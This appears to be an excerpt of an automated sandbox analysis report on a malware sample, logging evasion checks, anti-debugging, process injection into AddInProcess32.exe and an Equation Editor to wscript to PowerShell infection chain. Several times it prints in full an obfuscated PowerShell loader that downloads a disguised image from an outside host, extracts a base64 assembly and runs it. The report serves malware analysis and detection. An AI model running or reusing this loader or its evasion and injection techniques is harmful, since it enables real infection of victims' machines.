                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: AddInProcess32.exe, 00000008.00000002.478863572.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLT-
                  Source: powershell.exe, 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.0000000002545000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 200000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598720Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1512Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7943Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 300Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2864Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2204Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1764Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1764Thread sleep time: -598720s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1764Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1764Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2236Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1012Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598720Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: AddInProcess32.exe, 00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: AddInProcess32.exe, 00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: AddInProcess32.exe, 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00205318 CheckRemoteDebuggerPresent,8_2_00205318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520629 mov edx, dword ptr fs:[00000030h]2_2_03520629
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 41.216.183.13 80Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTR
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csReference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
                  Source: 6.2.powershell.exe.63545dc.3.raw.unpack, RunPEE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)
                  Source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, uRcQkDeJoO4.csReference to suspicious API methods: zHSk.OpenProcess(C6Nh1Wz8.DuplicateHandle, bInheritHandle: true, (uint)_4aIajlwkXEt2.ProcessID)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ".( $pshome[21]+$pshome[34]+'x') ( ('t0vlink = amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235ama; t0vwebclient = new-object system.net.webclient; try { t0vdownloadeddata = t0vwebclient.downloaddata(t0vlink) } catch'+' { write-host amafailed to do'+'wnload data from t0vlin'+'kama -foregroundcolor red'+'; exit }; if ('+'t0vdownloadeddata -ne t0vnull) { t0vimagetext = [system.text.encoding]::ut'+'f8.getstring(t0vdownloadeddata); t0vstartflag = ama<<base64_start>>ama; t0vendflag = ama<<base64_end>>ama; t0vstartindex = t0vimagetext.indexof(t0vstartflag); t0vendindex = t0vimagetext.indexof(t0vendflag); if (t0vstartindex -ge 0 -and t0vendindex -gt t0vstart'+'index) { t0vstartindex += t0vstartf'+'lag.length; t0vbase64len'+'gth = t0vendindex - t0vstartindex; t0vba'+'se64command = t0vimagetext.substring(t0vstartindex, t0vb'+'ase64length); t0vcommandbytes = [system.convert]::frombase64string(t0vbase64c'+'ommand); t0vloadedassembly = [system.reflection.as'+'sembly]::load(t0vcommandbytes); t0vtype = t'+'0vloadedassembly.gettype('+'amarunpe.homeama); t0vmethod = t0vtype.getmethod(amavaiama).invoke(t'+'0vnull, [object[]] (amatxt.esablanoitidartruo/651'+'.342.3.291//:ptthama , '+'amadesativadoama , amadesativadoama'+' , amade'+'sativadoama,amaaddinpro'+'cess32ama,amaama)) } }set scriptblock t0vlink = amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612am'+'a; t0vwebclient = new-o'+'bject system.net.webclien'+'t; try { t0vdownloadeddata = t0vwebclient.downloaddata(t0vlink) } catch { write-host amafailed to download data from t0vlinkama -foregroundcolor red; exit }; if (t0vdownloadeddata -ne t0vnull) { t0vimagetext = [system.text.encoding]::utf8.'+'getstring(t0vdownloadeddata); t0vstartflag '+'= ama<<base64_start>>ama; t0vendflag = ama<<base64_end'+'>>ama; t0vstartindex = t'+'0vi'+'magetext.indexof(t0vstartflag'+'); t0vendindex = t0vimagetext.index'+'of(t0vendflag); if (t0vstartindex '+'-g'+'e 0 -and t0vendindex -gt t0vstartindex) { '+'t0vstartindex += t0vstartflag.length; t0vbase64l'+'ength = t0vendindex - t0vstartindex; t0vbase64command'+' = t0vimagetext.substring(t0vstartindex, t0vbase64length); t0vcommandb'+'ytes = [sy'+'stem.convert]:'+':frombase64string(t0vbase64command); t0vloadedassembly = [system.reflection.assembly]::load(t0vcommandbytes); t0vtype = t0vloadedassembly.'+'gettype(amarunpe.homeama); t0vmethod ='+' t0vtype.getmet'+'hod(amavaiama).invoke(t0vnull,'+' [ob'+'ject[]] (amatxt.esabla'+'noitidartruo/651.342.'+'3.291//:ptthama , amadesativadoama , amadesativadoama , amadesativadoama,amaaddinprocess32ama,amadesativadoama)) } }').replace('t0v','$').replace(([char]65+[char]109+[char]97),[string][char]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ".( $pshome[21]+$pshome[34]+'x') ( ('t0vlink = amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235ama; t0vwebclient = new-object system.net.webclient; try { t0vdownloadeddata = t0vwebclient.downloaddata(t0vlink) } catch'+' { write-host amafailed to do'+'wnload data from t0vlin'+'kama -foregroundcolor red'+'; exit }; if ('+'t0vdownloadeddata -ne t0vnull) { t0vimagetext = [system.text.encoding]::ut'+'f8.getstring(t0vdownloadeddata); t0vstartflag = ama<<base64_start>>ama; t0vendflag = ama<<base64_end>>ama; t0vstartindex = t0vimagetext.indexof(t0vstartflag); t0vendindex = t0vimagetext.indexof(t0vendflag); if (t0vstartindex -ge 0 -and t0vendindex -gt t0vstart'+'index) { t0vstartindex += t0vstartf'+'lag.length; t0vbase64len'+'gth = t0vendindex - t0vstartindex; t0vba'+'se64command = t0vimagetext.substring(t0vstartindex, t0vb'+'ase64length); t0vcommandbytes = [system.convert]::frombase64string(t0vbase64c'+'ommand); t0vloadedassembly = [system.reflection.as'+'sembly]::load(t0vcommandbytes); t0vtype = t'+'0vloadedassembly.gettype('+'amarunpe.homeama); t0vmethod = t0vtype.getmethod(amavaiama).invoke(t'+'0vnull, [object[]] (amatxt.esablanoitidartruo/651'+'.342.3.291//:ptthama , '+'amadesativadoama , amadesativadoama'+' , amade'+'sativadoama,amaaddinpro'+'cess32ama,amaama)) } }set scriptblock t0vlink = amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612am'+'a; t0vwebclient = new-o'+'bject system.net.webclien'+'t; try { t0vdownloadeddata = t0vwebclient.downloaddata(t0vlink) } catch { write-host amafailed to download data from t0vlinkama -foregroundcolor red; exit }; if (t0vdownloadeddata -ne t0vnull) { t0vimagetext = [system.text.encoding]::utf8.'+'getstring(t0vdownloadeddata); t0vstartflag '+'= ama<<base64_start>>ama; t0vendflag = ama<<base64_end'+'>>ama; t0vstartindex = t'+'0vi'+'magetext.indexof(t0vstartflag'+'); t0vendindex = t0vimagetext.index'+'of(t0vendflag); if (t0vstartindex '+'-g'+'e 0 -and t0vendindex -gt t0vstartindex) { '+'t0vstartindex += t0vstartflag.length; t0vbase64l'+'ength = t0vendindex - t0vstartindex; t0vbase64command'+' = t0vimagetext.substring(t0vstartindex, t0vbase64length); t0vcommandb'+'ytes = [sy'+'stem.convert]:'+':frombase64string(t0vbase64command); t0vloadedassembly = [system.reflection.assembly]::load(t0vcommandbytes); t0vtype = t0vloadedassembly.'+'gettype(amarunpe.homeama); t0vmethod ='+' t0vtype.getmet'+'hod(amavaiama).invoke(t0vnull,'+' [ob'+'ject[]] (amatxt.esabla'+'noitidartruo/651.342.'+'3.291//:ptthama , amadesativadoama , amadesativadoama , amadesativadoama,amaaddinprocess32ama,amadesativadoama)) } }').replace('t0v','$').replace(([char]65+[char]109+[char]97),[string][char]39) )"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
